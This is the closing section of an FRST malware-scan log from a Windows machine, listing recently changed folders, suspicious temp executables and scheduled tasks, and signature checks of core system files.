2016-01-09 21:15 - 2013-08-22 07:36 - 00000000 ____D C:\WINDOWS\system32\NDF
2016-01-09 21:09 - 2015-07-20 16:05 - 00000000 ____D C:\Users\owner\AppData\Roaming\Skype
2016-01-09 21:09 - 2015-04-09 16:09 - 00551936 ___SH C:\Users\owner\Desktop\Thumbs.db
2016-01-09 19:42 - 2015-05-13 19:04 - 00000000 ____D C:\Users\owner\AppData\Local\ElevatedDiagnostics
2016-01-09 19:02 - 2012-07-25 21:26 - 00000301 _____ C:\WINDOWS\win.ini
2016-01-09 18:47 - 2015-01-23 01:16 - 00000000 ___DC C:\WINDOWS\Panther
2016-01-09 18:13 - 2015-06-07 15:45 - 00000000 ____D C:\Users\owner\AppData\Roaming\Curse Client
2016-01-09 18:00 - 2015-06-07 13:52 - 00000000 ____D C:\Users\owner\AppData\Local\NexonLauncher
2016-01-09 14:49 - 2015-02-26 12:13 - 00003910 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{59AA9515-0EFB-4314-9DA6-B2B84CDB5218}
2016-01-08 14:02 - 2012-07-25 23:59 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-01-07 22:29 - 2013-08-22 07:36 - 00000000 ___HD C:\Program Files\WindowsApps
2016-01-07 22:29 - 2013-08-22 07:36 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-01-06 00:14 - 2015-04-21 19:15 - 00000291 _____ C:\Users\owner\AppData\Roaming\WB.CFG
2016-01-04 22:00 - 2015-01-22 22:26 - 00000000 ____D C:\Users\owner
2016-01-03 21:49 - 2015-10-12 21:03 - 00000000 ____D C:\Users\owner\AppData\Roaming\TS3Client
2016-01-03 21:42 - 2015-03-30 19:19 - 00000000 ____D C:\Users\owner\AppData\Roaming\Riot Games
2016-01-03 20:37 - 2015-10-23 16:18 - 00000000 ____D C:\Users\owner\AppData\Local\Warframe
2015-12-29 13:38 - 2013-08-22 06:44 - 00513128 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2015-12-28 17:04 - 2015-09-16 07:26 - 00003718 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player Updater
2015-12-27 17:22 - 2015-09-15 07:52 - 00000000 ____D C:\ProgramData\Hewlett-Packard
2015-12-27 17:22 - 2012-09-03 08:15 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2015-12-25 17:54 - 2015-07-20 16:05 - 00000000 ____D C:\ProgramData\Skype
2015-12-24 12:57 - 2015-04-02 18:19 - 00000000 ____D C:\Users\owner\AppData\Local\Steam
2015-12-21 23:27 - 2015-07-20 16:06 - 00000000 ____D C:\Users\owner\AppData\Local\Skype
2015-12-21 23:27 - 2015-07-20 16:05 - 00000000 ___RD C:\Program Files (x86)\Skype
2015-12-21 23:16 - 2012-09-03 08:15 - 00000000 ____D C:\Program Files (x86)\McAfee
2015-12-20 15:06 - 2015-10-26 15:43 - 00000000 ____D C:\WINDOWS\System32\Tasks\NCH Software
2015-12-13 15:06 - 2015-10-26 15:43 - 00000000 ____D C:\ProgramData\NCH Software
2015-12-13 15:06 - 2015-10-26 15:43 - 00000000 ____D C:\Program Files (x86)\NCH Software

==================== Files in the root of some directories =======

2015-10-26 15:43 - 2015-10-26 15:43 - 0001167 _____ () C:\Users\owner\AppData\Roaming\trace_FilterInstaller.txt
2015-10-26 15:43 - 2015-10-26 15:43 - 0000000 _____ () C:\Users\owner\AppData\Roaming\trace_FilterInstaller.txt-CRT.txt
2015-04-21 19:15 - 2016-01-06 00:14 - 0000291 _____ () C:\Users\owner\AppData\Roaming\WB.CFG
2016-01-09 16:32 - 2016-01-09 16:32 - 0041472 _____ () C:\Users\owner\AppData\Local\Donelectronics.dat
2016-01-09 16:32 - 2016-01-09 16:32 - 0028160 _____ () C:\Users\owner\AppData\Local\Donelectronics.exe
2016-01-09 16:32 - 2016-01-09 16:32 - 0000187 _____ () C:\Users\owner\AppData\Local\Donelectronics.exe.config
2015-05-13 22:14 - 2015-05-13 22:14 - 0274045 _____ () C:\Users\owner\AppData\Local\dsi1.dat
2015-05-13 22:14 - 2015-05-13 22:14 - 0161916 _____ () C:\Users\owner\AppData\Local\dsi2.dat
2015-09-22 08:49 - 2015-09-22 08:49 - 0000000 _____ () C:\Users\owner\AppData\Local\{F9A1F101-40FE-48E1-BEBF-FD740E21840E}
2012-10-09 14:39 - 2012-10-09 14:39 - 0000000 ____H () C:\ProgramData\DP45977C.lfl

Files to move or delete:
====================
C:\Windows\Tasks\{0B7F0947-7E7A-0B05-7E11-797A790F110F}.job
C:\Windows\Tasks\{0D0F7F47-0B7A-097F-7E11-050A09041178}.job


Some files in TEMP:
====================
C:\Users\owner\AppData\Local\Temp\2A80.tmp.exe
C:\Users\owner\AppData\Local\Temp\34EC.tmp.exe
C:\Users\owner\AppData\Local\Temp\3F71.tmp.exe
C:\Users\owner\AppData\Local\Temp\427B.tmp.exe
C:\Users\owner\AppData\Local\Temp\63FD.tmp.exe
C:\Users\owner\AppData\Local\Temp\6A02.tmp.exe
C:\Users\owner\AppData\Local\Temp\8076.tmp.exe
C:\Users\owner\AppData\Local\Temp\amisetup5102__15940.exe
C:\Users\owner\AppData\Local\Temp\amisetup9783__15940.exe
C:\Users\owner\AppData\Local\Temp\amzngtb.exe
C:\Users\owner\AppData\Local\Temp\avg6A34.exe
C:\Users\owner\AppData\Local\Temp\avgE955.exe
C:\Users\owner\AppData\Local\Temp\B213.tmp.exe
C:\Users\owner\AppData\Local\Temp\C512.tmp.exe
C:\Users\owner\AppData\Local\Temp\C546.tmp.exe
C:\Users\owner\AppData\Local\Temp\D8EB.tmp.exe
C:\Users\owner\AppData\Local\Temp\DA3.tmp.exe
C:\Users\owner\AppData\Local\Temp\DFF8.tmp.exe
C:\Users\owner\AppData\Local\Temp\EB6C.tmp.exe
C:\Users\owner\AppData\Local\Temp\FD40.tmp.exe
C:\Users\owner\AppData\Local\Temp\Flashbeat_Setup.exe
C:\Users\owner\AppData\Local\Temp\Looksafe_Setup.exe
C:\Users\owner\AppData\Local\Temp\nsz1850.exe
C:\Users\owner\AppData\Local\Temp\Opera_NI_stable.exe
C:\Users\owner\AppData\Local\Temp\setup_766.exe
C:\Users\owner\AppData\Local\Temp\SpOrder.dll
C:\Users\owner\AppData\Local\Temp\TranDex.exe
C:\Users\owner\AppData\Local\Temp\Uninstall.exe
C:\Users\owner\AppData\Local\Temp\UninstallModule.exe
C:\Users\owner\AppData\Local\Temp\Vivafind.exe
C:\Users\owner\AppData\Local\Temp\Voldom.exe
C:\Users\owner\AppData\Local\Temp\widgett.exe


==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll
[2015-01-23 12:05] - [2015-01-23 12:05] - 0657920 ____A (Microsoft Corporation) 261452CF5C52EB6514A005FDCC7EDA12

C:\WINDOWS\SysWOW64\dnsapi.dll
[2015-01-23 12:05] - [2015-01-23 12:05] - 0498688 ____A (Microsoft Corporation) 27EE78502A66B4B9E4BD66C5FD081B59

C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2016-01-03 06:38

==================== End of FRST.txt ============================
 
Back